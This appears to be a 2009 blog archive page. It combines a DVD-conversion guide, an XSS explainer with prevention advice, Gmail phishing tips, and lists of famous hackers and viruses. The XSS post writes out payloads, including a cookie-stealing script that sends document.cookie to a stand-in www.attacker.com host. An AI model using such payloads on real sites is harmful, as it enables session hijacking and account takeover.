Saturday, August 15, 2009

How to Convert Your Movies Easily to DVD

0 comments
How to Convert Your Movies Easily to DVD

Update: Added Convert X To DVD V3 Guide.

Hi welcome to my simple guide on how to convert your avi, divx, xvid, mov... movies to DVD so they can be playing in any standard home DVD player for your viewing pleasure.

Convert X To DVD Version 2.x.x.x.xxx Guide

The program you will be using is Convert X to DVD by VSO.
Code:
http://www.vso-software.fr/products/convert_x_to_dvd/


After you have installed it, edit your settings, to do that go here
Image

Now edit your settings to match mine, when you have got to know the program better you can change these settings to what you like.

Here pick how long you want your chapters to be repeated, every 3 minutes is a good option.
Image

Image

Now here you must select the correct one for your location or for where you want your DVD to work.
Image

Near the bottom of these pages will tell you what your country or area uses.
Code:
http://en.wikipedia.org/wiki/PAL
http://en.wikipedia.org/wiki/NTSC


Here you will need to select how much priority the program has and the movie quality, the higher the priority the faster it will do its work, I would select Above Normal here but it’s total up to you.
Image

I don't know why VSO added this option, with it selected (ticked) it makes everything look blocky.
Good (with this setting turned off)
Code:
http://i24.ahpic.com/78i6ox.png

Bad (with this setting turned on)
Code:
http://i24.ahpic.com/ctvai3.png

Image

For the burning speed I would chose something between 2x and 8x the slower the better. Try to use DVD-R or DVD+R discs, the best brands at the moment are Taiyo Yuden & Verbatim.
Image


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

So now onto the actual converting, after you have edited the setting that’s it you’re ready to go you won’t need to edit the settings again, unless you would like to.

So make sure you have a blank DVD-R or DVD+R in your drive.

Then Click here to select your movie file.
Image

Then locate your movie file and select it.
Image

Now Click on Convert and let it do its work.
Image

Please note it will take time to convert.
It took my computer 30 Minutes to convert this movie (2GB Of DDR2 Ram, Intel Core 2 Duo E6400) Times will vary.

How to add subtitles
Code:
http://www.vso-software.fr/faq/add_subtitles_to_dvd/add_subtitles_to_dvd.php


:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Convert X To DVD Version 3.x.x.x Guide

Now edit your settings to match mine, when you have got to know the program better you can change these settings to what you like.

After you have installed it, edit your settings, to do that go here
Image

Here pick how long you want your chapters to be repeated, every 3 minutes is a good option.
Image

Image

Now here you must select the correct one for your location or for where you want your DVD to work. (Normally selected when installed)

Image

Near the bottom of these pages will tell you what your country or area uses.
Code:
http://en.wikipedia.org/wiki/PAL
http://en.wikipedia.org/wiki/NTSC


Here you will need to select how much priority the program has and the movie quality, the higher the priority the faster it will do its work, I would select Higher here but it’s total up to you.

Image

Image

For the burning speed I would chose something between 2x and 8x the slower the better. Try to use DVD-R or DVD+R discs, the best brands at the moment are Taiyo Yuden & Verbatim.

Image

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

So now onto the actual converting, after you have edited the setting that’s it you’re ready to go you won’t need to edit the settings again, unless you would like to.

So make sure you have a blank DVD-R or DVD+R in your drive.

Then Click here to select your movie file.
Image

Then locate your movie file and select it.
Image

Now Click on Convert and let it do its work.
Image

Please note it will take time to convert.
It took my computer 25 Minutes to convert this movie (2GB Of DDR2 Ram, Intel Core 2 Duo E6400) Times will vary.

Edit: 6 Minutes on my Core i7 920, 6GB DDR3 Ram :>

How to add subtitles
Code:
http://www.vso-software.fr/faq/add_subtitles_to_dvd/add_subtitles_to_dvd.php


Happy Converting!

India's First Independence Day Celebrations In Delhi 15 AUG

0 comments



Image

Code:
http://rapidshare.com/files/267437657/India_s_First_Independence_Day_Celebrations_In_Delhi_15_AUGUST_1947_Photo_Gallery_.rar

Thursday, August 6, 2009

Cross Website Scripting(XSS) Info and Prevention

0 comments

Welcome to the hacking discussion blog

So here I m gonna write an article over XSS aka cross website scripting …………

Some declaration-this article is only meant for educational purpose if someone uses it for wrong purpose then HD blog is not responsible for it .

Note – since HDB will not going to show the codes so I modify then now there is some new parameter which means something else

< = {

> = }

Introduction

Cross Site Scripting aka XSS is one of the most common application level attacks that hackers use to sneak into web applications today. They are unique in that, rather than attacking a server directly, they use a vulnerable server as a vector to attack a client. This can lead to extreme difficulty in tracing attackers, especially when requests are not fully logged Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the XSS attack involves three parties – the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies and impersonates the victim.

TYPES OF XSS

LOCAL XSS

This form of XSS is rarely mentioned, because it is very hard to pull off and requires knowledge of either browser exploits or local OS html files. For the first scenario, the attacker could use their website to send malicious commands to the local users vulnerable HTML files(look in /WINDOWS, there are HTML files there) that executes some command on the users system. The second form that this attack can take is using browser exploits. Using a browser exploit, the attacker can plant an activeX script locally on the users system, which can run under local HTML priveleges(all javascripts are allowed without confirmation) and install backdoors, worms, spambots etc.

Non-persistent XSS

This type of XSS attack does no harm to the site itself, and they are created when javascript can be injected into a variable that is echoed back to the user in some way. Say when you enter some text into a search bar and press submits, and the new page that is loaded has what you searched saved in the search bar. You could escape the input tag using “} then inject script, e.g. {script}alert(”war10rd”){/script}. This is only useful in social engineering where you get a user, or administrator, to visit the page with the same parameters you provided to create the XSS, only this time with a cookie stealer script on the page. This will execute for them, logging their cookies to a site you choose

Persistent XSS

This kind of XSS is what is mostly used against guestbooks, forums and other permanent user content pages. When this type of XSS is used it stays on the page and can be used in many ways; stealing cookies, defacing a page, and spreading (the new “XSS worm” phenomenon same as the famous orkut worm)

NOW XSS ATTACK

XSS attacks are the result of flaws in server- side web applications and are rooted in user input which is not properly sanitized for HTML characters. If the attacker can insert arbitrary HTML then they could control execution of the page under permissions of the site. Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them. These links cause client side scripting languages (VBScript, JavaScript, etc.) of the attacker’s choice to execute on the victim’s browser. XSS vulnerabilities are caused by a failure in the web application to properly validate user input. The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags (much like the Badtrans worm). There are numerous ways to inject JavaScript code into URLs for the purpose of a XSS attack

Let see one example

{?php echo “Hello, {$HTTP_GET_VARS['name']}!”; ?}

Once the page is accessed, the variable sent via the GET method is placed directly on the rendered page. Since the input is not marked as variable input , the user- supplied input is interpreted exactly as its metacharacters command, very similar to SQL injection. Passing “Hacking discussion” as an argument outputs the content in correct form:

http://hdhost/hello.php?name=hacking%20discussion

now let us call site we use for XSS is called

http://www.xyz.com

At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or path) and echoes it back to the response page, in full or in part, without first sanitizing it i.e. making sure it doesn’t contain Javascript code and/or HTML tags. Suppose, therefore, that this script is named 1.cgi, and its parameter is “name”. It can be operated this way:

GET /1.cgi?name=hacking%20discussion HTTP/1.0

Host: www.xyz.com

And the response would be:

{HTML}

{Title}1!{/Title}

Hi hacking discussion

{BR}

Welcome to our system

…

{/HTML}

Now explanation

Well, the attacker manages to lure the victim client into clicking a link the attacker supplies to him/her. This is a carefully and maliciously crafted link, which causes the web browser of the victim to access the site ( www.xyz.com ) and invoke the vulnerable script. The data to the script consists of a Javascript that accesses the cookies the client browser has for www.xyz.com . It is allowed, since the client browser “experiences” the Javascript coming from www.xyz.com , and Javascript’s security model allows scripts arriving from a particular site to access cookies belonging to that site.

Such a link looks like:

http://www.xyz.com/1.cgi?name={script}alert(document.cookie){/script}

The victim, upon clicking the link, will generate a request to www.xyz.com , as follows:

GET /1.cgi?name={script}alert(document.cookie){/script} HTTP/1.0

Host: www.xyz.com

…

And the vulnerable site response would be:

{HTML}

{Title}1!{/Title}

Hi {script}alert(document.cookie){/script}

{BR}

Welcome to our system

…

{/HTML}

The victim client’s browser would interpret this response as an HTML page containing a piece of

Javascript code. This code, when executed, is allowed to access all cookies belonging to

www.xyz.com, and therefore, it will pop-up a window at the client browser showing all client

cookies belonging to www.xyz.com. Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a web site (www.xyz.com), and use a script to receive the cookies. Instead of popping up a window, the attacker would write a code that accesses a URL at his/her own site (www.xyz.com), invoking the cookie reception script with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.com server. The malicious link would be:

http:// www.xyz.com /1.cgi?name={script}window.open(“http://www.attacker.com/collec

t.cgi?cookie=”%2Bdocument.cookie){/script}

And the response page would look like:

{HTML}

{Title}1!{/Title}

Hi

{script}window.open(“http://www.attacker.com/collect.cgi?cookie=”+document.cookie){

/script}

{BR}

Welcome to our system

…

{/HTML}

The browser, immediately upon loading this page, would execute the embedded Javascript and would send a request to the collect.cgi script in www.attacker.com, with the value of the cookies of www.xyz.com that the browser already has. This compromises the cookies of www.xyz.com that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached. It should be noted, that causing the Javascript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to a XSS attack. If Javascript’s “alert” function can be called, there’s usually no reason for the “window.open” call not to succeed. That is why most examples for XSS attacks use the alert function, which makes it very easy to detect its success.

Now Security

As a web application user, there are a few ways to protect your self from XSS attacks. The first

and most effective solution is to disable all scripting language support in your browser and email

reader. another thing is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages. Additionally, as a last resort, proxy servers can help filter out malicious scripting in HTML

Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that are transmitted between the browser and web server. The best philosophy to follow regarding user input filtering is to deny all but a pre-selected element set of benign characters in the web input stream. This prevents developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).

Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to upgrades, integration of third party technologies, and decentralized website authoring. Many vulnerability web application scanners are now starting to include checks for XSS, although it is unlikely that any current automated will be truly comprehensive.

By installing a third party application firewall, which intercepts CSS attacks before they reach the web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods (including path and HTTP headers) in a generic way, regardless of the script/path from the in-house application, a third party script, or a script describing no resource at all (e.g. designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and Javascript patterns, and if any match, the request is rejected and the malicious input does not arrive to the server.

References –

Cross Site Scripting Explained by Amit Klein, Sanctum Security Group

Types of xss attack by cybern00b

The Evolution of Cross-Site Scripting Attacks By David Endler

The Anatomy of Cross Site Scripting by Gavin Zuchlinski

CREDITS:- http://www.hackingdiscussion.com

Six ways to protect your gmail account from being cracked

0 comments

What is phishing?

Phishing is the best working method of hacking email accounts. The advantage of phishing in email account hacking is that victim is not able to recognize the fake page (phisher) as this phisher matches with the original page (depends on cracker’s skills).

So, here I have mentioned few tips which you should follow to prevent cracking of your email account by crackers.

1. Phishing filter:
I will recommend use of browser which has phishing filter.Web browsers like Firefox 3.0+ (my favorite), Internet Explorer 7+, Opera 7x supports phishing filter and should be used for safe browsing.

2. Do not provide sensitive information :
Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like user ids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for cracking!

3. Suspicious Filters :
Check whether there are any suspicious filters not created by you. For checking your email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.

4. Great offers, ads, winners :
Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that you are a lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails, unless you’ve actually participated in any of the said competitions, chances are that, you never had!

5. Disable Forwarding and POP/IMAP :
To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.

6. The most important :
The most important precaution which one must follow is “do not click on the link” provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to crack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.

Thus, if you will follow these guidelines, i bet your Gmail account will never be cracked by a phisher. Just remember the guidelines and prevent Gmail account from being cracked by crackers.

source: This isn’t my original article, but an aggregate information I’ve gathered in time, which will hopefully help you.


CREDITS:- http://www.hackingdiscussion.com

Monday, August 3, 2009

List Of Worlds Best hackers

0 comments
Hackers, a group that consists of skilled computer enthusiasts. A black hat is a person who compromises the security of a computer system without permission from an authorized party, typically with malicious intent. The term white hat is used for a person who is ethically opposed to the abuse of computer systems, but is frequently no less skilled. The term cracker was coined by Richard Stallman to provide an alternative to using the existing word hacker for this meaning.The somewhat similar activity of defeating copy prevention devices in software which may or may not be legal in a country's laws is actually software cracking....


List of Famous Hackers of All Time:




There are numbers of Hackers in the world till date, Few has become famous by their Black hat work and few of them are famous by their Ethical Hacking. Below is separate list of World's All Time Best Hackers and Crackers. Although I represent them by Hackers only because what every they did, was wrong but one thing is sure they were Brilliant. Hacking is not a work of simple mind, only Intelligent Mind can do that.


Gary McKinnon

Gary McKinnon, 40, accused of mounting the largest ever hack of United States government computer networks -- including Army, Air Force, Navy and NASA systems The court has recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing US$700,000 (400,000 pounds; euro 588,000) in damage.


Jonathan James

The youth, known as "cOmrade" on the Internet, pleaded guilty to intercepting 3,300 email messages at one of the Defense Department's most sensitive operations and stealing data from 13 NASA computers, including some devoted to the new International Space Station. James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive e-mails and capture employee usernames and passwords.James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost.


Adrian Lamo

Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. In a profile article, “He Hacks by Day, Squats by Night,” Lamo reflects, “I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional.”Dubbed the “homeless hacker,” he used Internet connections at Kinko’s, coffee shops and libraries to do his intrusions. For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

Kevin Mitnick

The Department of Justice describes him as “the most wanted computer criminal in United States history.” His exploits were detailed in two movies: Freedom Downtime and Takedown. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation’s computer network and stealing software.Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.


Kevin Poulsen

Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio’s KIIS-FM phone lines, (taing over all of the station’s phone lines) which earned him a brand new Porsche, among other items. Law enforcement dubbed him “the Hannibal Lecter of computer crime.”Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.His hacking specialty, however, revolved around telephones. Poulsen’s most famous hack, In a related feat, Poulsen also “reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency.” Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.


Robert Tappan Morris

Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.

Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years’ probation, 400 hours of community service and a fined $10,500.Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roofnet.


Vladimir Levin


Levin accessed the accounts of several large corporate customers of Citibank via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in Finland, the United States, the Netherlands, Germany and Israel.In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name ArkanoiD a memorandum on popular Provider.net.ru website dedicated to telecom market.According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).


David Smith

David Smith, the author of the e-mail virus known as Melissa, which swamped computers around the world, spreading like a malicious chain letter. He was facing nearly 40 years in jail . About 63,000 viruses have rolled through the Internet, causing an estimated $65 billion in damage, but Smith is the only person to go to federal prison in the United States for sending one.


Mark Abene

Abene (born 1972), better known by his pseudonym Phiber Optik, is a computer security hacker from New York City. Phiber Optik was once a member of the Hacker Groups Legion of Doom and Masters of Deception. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems.

Phiber Optik was a high-profile hacker in the early 1990s, appearing in The New York Times, Harper’s, Esquire, in debates and on television. Phiber Optik is an important figure in the 1995 non-fiction book Masters of Deception — The Gang that Ruled Cyberspace


Onel A. de Guzman

el A. de Guzman, a Filipino computer student, Greatest Hacker of all time. He was creator of "Love Bug" virus that crippled computer e-mail systems worldwide.

Chen Ing-hau

He was the creator of one of the deadly virus of all time "Chernobyl computer virus " which had melted down many computers worldwide.





Mudge

"Mudge" along with fellow hackers told the committee that computer security is so lax, they could disable the entire Internet in a half-hour.



Tsutomu Shimomura

One of the world's top computer security experts. Shimomura helped Federal officials track down and arrest computer hacker Kevin Mitnickin Raleigh Feb. 15, 1995 in connection with a break-in on Shimomura's computer.





Jon Lech Johansen

Johansen, who became a hero to computer hackers and was deemed a villain by Hollywood, is on trial for writing and distributing a program called DeCSS, software which makes it possible to copy protected DVD films. Prosecutors have asked to have his computers confiscated and called for him to pay $1,400 in court costs.



Dmitry Sklyarov

Russian computer programmer who was charged with violating copyrights, Sklyarov was jailed after developing software that allows the user to circumvent the copyright protections in Adobe Systems eBook reader program.


Dennis Moran

Moran, known on the Web as "Coolio," pleaded guilty to hacking into national computer sites last year belonging to the Army, the Air Force and the anti-drug Dare.com.








Famous Three Master Hackers




Some Grand Famous Hackers of Life Time:

Richard Stallman

He was the founder of GNU Projects. Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.


Linus Torvalds

Father of Linux is a good hacker of all time.












Stephen Wozniak

"Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.









Some Other famous Hackers :

Dennis Ritchie and Ken Thompson
John Draper
Johan Helsingius
Eric Steven Raymond
Ian Murphy
John Perry Barlow
Tim Berner Lee

Most dangerous computer viruses

1 comments

Computer viruses have a relatively short history by the damages caused by some of the most dangerous viruses pushed cyber-experts to open a chapter that includes a huge database on computer viruses and the cost of damages caused along with companies, government and universities highly affected by malware.

Here are some of the most dangerous computer viruses in history:

Virus

Jerusalem – 1988

This is one of the first MS-DOS viruses in history that caused enormous destructions, affecting many countries, universities and company worldwide. On Friday 13, 1988 the computer virus managed to infect a number of institutions in Europe, America and the Middle East. The name was given to the virus after one of the first places that got “acquainted” with it – the Jerusalem University.

Along with a number of other computer viruses, including “Cascade”, “Stoned”, “Vienna” the Jerusalem virus managed to infect thousands of computers while still remaining unnoticed. Back then the anti-virus programs were not as advanced as they are today and a lot of users had little belief of the existence of computer viruses.
Read more

Morris (a.k.a. Internet Worm) – November 1988

This computer virus infected over 6,000 computer systems in the United States, including the famous NASA research Institute, which for some time remained completely paralyzed. Due to erratic code, the worm managed to send millions of copies of itself to different network computers, being able to entirely paralyze all network resources. The damages caused by the Morris computer virus were estimated at $96 millions.

To be able to spread the computer virus used errors in such operating systems as Unix for VAX and Sun Microsystems. There were a number of other interesting ideas used by the virus – for example it could pick user passwords.

Solar Sunrise – 1998

A decade later the situation didn’t change, it might have gotten even got worse. Using a computer virus, hackers, in 1998, penetrated and took control of over 500 computers systems that belonged to the army, government and private sector of the United States. The whole situation was dubbed Solar Sunrise after the popular vulnerabilities in computers that run on the operating system called Sun Solaris. Initially it was believed that the attacks were planed by the operatives in Iraq. It was later revealed that the incidents represented the work of two American teenagers from California. After the attacks, the Defense Department took drastic actions to prevent future incidents of this kind.

Melissa – 1999

For the first time computers got acknowledged with Melissa computer virus on March 26, 1999, when the virus shut down Internet mail system, which got blocked with e-mails infected by the worm. It is worth mentioning that at first Melissa was not meant to cause any harm, but after it overloaded servers the virus led to unpredictable problems. For the first time it spread in the Usenet discussion group alt.sex. Melissa was hidden within a file called “List.DiC”, which featured passwords that served as keys to unlocking 80 pornographic websites. The original form of the virus was sent through e-mail to different users.

Melissa computer virus was developed by David L. Smith in Aberdeen Township, New Jersey. Its name comes from a lap dancer that the programmer got acknowledged with while in Florida. After being caught, the creator of the virus was sentenced to 20 months in federal prison and ordered to pay a fine of $5,000. The arrest represented a collaboration of FBI, New Jersey State Police and Monmouth Internet.

Melissa had the ability to multiply on Microsoft Word 97 and Word 2000, as well as Microsoft Excel 97, 2000 and 2003. In addition, the virus had the ability to mass-mail itself from Microsoft Outlook 97 or Outlook 98.


I Love You – May 2000

Using a similar method as the Melissa, the computer virus dubbed “I Love You” managed to infect millions of computers around the world in just one night. Just like Melissa this computer virus sent passwords and usernames, which were stored on the attacked computers, back to the developer of the virus. After authorities traced the virus they found that a young Filipino student was behind the attack. The young man was released due to the fact that the Philippines did not have any law that would prevent hacking and spreading malware. This situation served as one of the premises for creating the European Union’s global Cybercrime Treaty.

The Code Red worm – July 2001
This 21st century computer virus managed to penetrate tens of thousands of systems that ran Microsoft Windows NT as well as Windows 2000 server software. The damages caused by the Code Red computer virus were estimated at a total of $2 billion. Core Red was developed to use the power of all computers it infected against the official website of the White House at a predetermined date. In collaboration with different virus hunters and tech firms, the White House managed to decipher the code of the Code Red virus and stop traffic as the malware started its attacks.


Nimda – 2001

Shortly after the September 11 tragedy this computer virus infected hundreds of thousands of computers worldwide. Nimda was considered to be one of the most complicated viruses, having up to 5 different methods of infecting computers systems and duplicating itself.


Downadup – 2009

The latest and most dangerous virus is the “downadup” worm, which was also called “Conficker”. The computer security company F-Secure stated that the computer virus has infected 3.5 million computers worldwide. This malicious program was able to spread using a patched Windows flaw. Downadup was successful in spreading across the Web due to the fact that it used a flaw that Microsoft patched in October in order to distantly compromise computers that ran unpatched versions of Microsoft’s operating system. But the greatest power of the worm is believed to be the ability of computers, infected with the worm, to download destructive code from a random drop point. F-Secure stated that three of the most affected countries were China, Brazil and Russia.

Followers

 

╚►ITECHNOGURU™◄╝. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com